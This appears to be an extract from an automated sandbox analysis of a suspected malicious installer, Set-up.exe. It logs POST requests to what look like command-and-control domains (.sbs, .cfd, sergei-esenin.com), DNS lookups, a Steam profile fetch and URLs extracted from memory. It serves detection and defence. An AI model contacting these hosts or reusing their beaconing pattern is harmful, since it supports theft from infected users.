Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: drawwyobstacw.sbs
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=4G4G655HG37LedGy7IC8mS3vzKXQFLHIQIpWE8gp8rk-1728812542-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 82Host: sergei-esenin.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com

Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: sippymroat.cfd
Source: global traffic	DNS traffic detected: DNS query: mathcucom.sbs
Source: global traffic	DNS traffic detected: DNS query: allocatinow.sbs
Source: global traffic	DNS traffic detected: DNS query: enlargkiw.sbs
Source: global traffic	DNS traffic detected: DNS query: resinedyw.sbs
Source: global traffic	DNS traffic detected: DNS query: vennurviot.sbs
Source: global traffic	DNS traffic detected: DNS query: ehticsprocw.sbs
Source: global traffic	DNS traffic detected: DNS query: condifendteu.sbs
Source: global traffic	DNS traffic detected: DNS query: drawwyobstacw.sbs
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: sergei-esenin.com

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sippymroat.cfd

Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: Set-up.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: Set-up.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: Set-up.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: Set-up.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Set-up.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: Set-up.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: Set-up.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: Set-up.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: Set-up.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: Set-up.exe	String found in binary or memory: http://ocsp.digicert.com0
Source: Set-up.exe	String found in binary or memory: http://ocsp.digicert.com0A
Source: Set-up.exe	String found in binary or memory: http://ocsp.digicert.com0C
Source: Set-up.exe	String found in binary or memory: http://ocsp.digicert.com0X
Source: Set-up.exe, 00000000.00000003.1934108862.0000000000DDA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: Set-up.exe, 00000000.00000003.1934108862.0000000000DDA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: Set-up.exe, 00000000.00000003.1934108862.0000000000DDA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: Amcache.hve.6.dr	String found in binary or memory: http://upx.sf.net
Source: Set-up.exe	String found in binary or memory: http://www.activestate.com
Source: Set-up.exe	String found in binary or memory: http://www.activestate.comHolger
Source: Set-up.exe	String found in binary or memory: http://www.baanboard.com
Source: Set-up.exe	String found in binary or memory: http://www.baanboard.comBrendon
Source: Set-up.exe	String found in binary or memory: http://www.develop.com
Source: Set-up.exe	String found in binary or memory: http://www.develop.comDeepak
Source: Set-up.exe	String found in binary or memory: http://www.digicert.com/CPS0
Source: Set-up.exe	String found in binary or memory: http://www.lua.org
Source: Set-up.exe	String found in binary or memory: http://www.rftp.com
Source: Set-up.exe	String found in binary or memory: http://www.rftp.comJosiah
Source: Set-up.exe	String found in binary or memory: http://www.scintilla.org
Source: Set-up.exe	String found in binary or memory: http://www.scintilla.org/scite.rng
Source: Set-up.exe	String found in binary or memory: http://www.spaceblue.com
Source: Set-up.exe	String found in binary or memory: http://www.spaceblue.comMathias
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: Set-up.exe, 00000000.00000003.1860446631.0000000000D92000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1849935104.0000000000D91000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://allocatinow.sbs/
Source: Set-up.exe, 00000000.00000003.1860446631.0000000000D92000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1849935104.0000000000D91000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://allocatinow.sbs/2
Source: Set-up.exe, 00000000.00000003.1849935104.0000000000D91000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://allocatinow.sbs/api
Source: Set-up.exe, 00000000.00000003.1849935104.0000000000D91000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://allocatinow.sbs/apisC
Source: Set-up.exe, 00000000.00000003.1849935104.0000000000D91000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://allocatinow.sbs/pi
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.akamai.steamstatic
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&a
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
Source: Set-up.exe, 00000000.00000003.1934108862.0000000000DDA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: Set-up.exe, 00000000.00000003.1934108862.0000000000DDA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: Set-up.exe, 00000000.00000003.1934108862.0000000000DDA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: Set-up.exe, 00000000.00000003.1934108862.0000000000DDA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=bz0kMfQA
Source: Set-up.exe, 00000000.00000003.1934108862.0000000000DDA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPi
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jGtzAgjYROne&l=e
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
Source: Set-up.exe, 00000000.00000003.1933909044.0000000000D88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drawwyobstacw.sbs/api
Source: Set-up.exe, 00000000.00000003.1882257795.0000000000D92000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1891644416.0000000000D88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ehticsprocw.sbs/
Source: Set-up.exe, 00000000.00000003.1882257795.0000000000D92000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1891644416.0000000000D88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ehticsprocw.sbs/B
Source: Set-up.exe, 00000000.00000003.1882257795.0000000000D92000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1891644416.0000000000D88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ehticsprocw.sbs/api
Source: Set-up.exe, 00000000.00000003.1882257795.0000000000D92000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1891644416.0000000000D88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ehticsprocw.sbs/apisU
Source: Set-up.exe, 00000000.00000003.1882257795.0000000000D92000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ehticsprocw.sbs/j
Source: Set-up.exe, 00000000.00000003.1882257795.0000000000D92000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1891644416.0000000000D88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ehticsprocw.sbs/pi
Source: Set-up.exe, 00000000.00000003.1860446631.0000000000D92000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://enlargkiw.sbs/
Source: Set-up.exe, 00000000.00000003.1860446631.0000000000D92000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://enlargkiw.sbs/&0
Source: Set-up.exe, 00000000.00000003.1860446631.0000000000D92000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://enlargkiw.sbs/api
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/en/
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
Source: Set-up.exe, 00000000.00000003.1849993860.0000000000D78000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1849935104.0000000000D91000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mathcucom.sbs/
Source: Set-up.exe, 00000000.00000003.1849993860.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mathcucom.sbs/api
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: Set-up.exe, 00000000.00000003.1882257795.0000000000D92000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://resinedyw.sbs/
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: Set-up.exe, 00000000.00000003.1933909044.0000000000D88000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2124248780.0000000000D28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com/
Source: Set-up.exe, 00000000.00000002.2124248780.0000000000D4B000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2124248780.0000000000D54000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com/api
Source: Set-up.exe, 00000000.00000003.1933909044.0000000000D88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com/api$
Source: Set-up.exe, 00000000.00000003.1933909044.0000000000D88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com/api1
Source: Set-up.exe, 00000000.00000003.1933909044.0000000000D88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com/r
Source: Set-up.exe, 00000000.00000002.2124248780.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1933909044.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com:443/api
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.tv/
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.net
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1933909044.0000000000D54000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: Set-up.exe, 00000000.00000003.1933909044.0000000000D54000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/a1
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/discussions/
Source: Set-up.exe, 00000000.00000003.1934108862.0000000000DDA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/market/
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: Set-up.exe, 00000000.00000003.1933909044.0000000000D54000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: Set-up.exe, 00000000.00000003.1934108862.0000000000DDA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: Set-up.exe, 00000000.00000003.1934108862.0000000000DDA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: Set-up.exe, 00000000.00000003.1933909044.0000000000D54000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900Q1
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/workshop/
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/about/
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/explore/
Source: Set-up.exe, 00000000.00000003.1934108862.0000000000DDA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/mobile
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/news/
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/stats/
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: Set-up.exe, 00000000.00000003.1891644416.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1882257795.0000000000D92000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1891644416.0000000000D88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vennurviot.sbs/
Source: Set-up.exe, 00000000.00000003.1882257795.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vennurviot.sbs/=0
Source: Set-up.exe, 00000000.00000003.1882257795.0000000000D92000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1891644416.0000000000D88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vennurviot.sbs/api
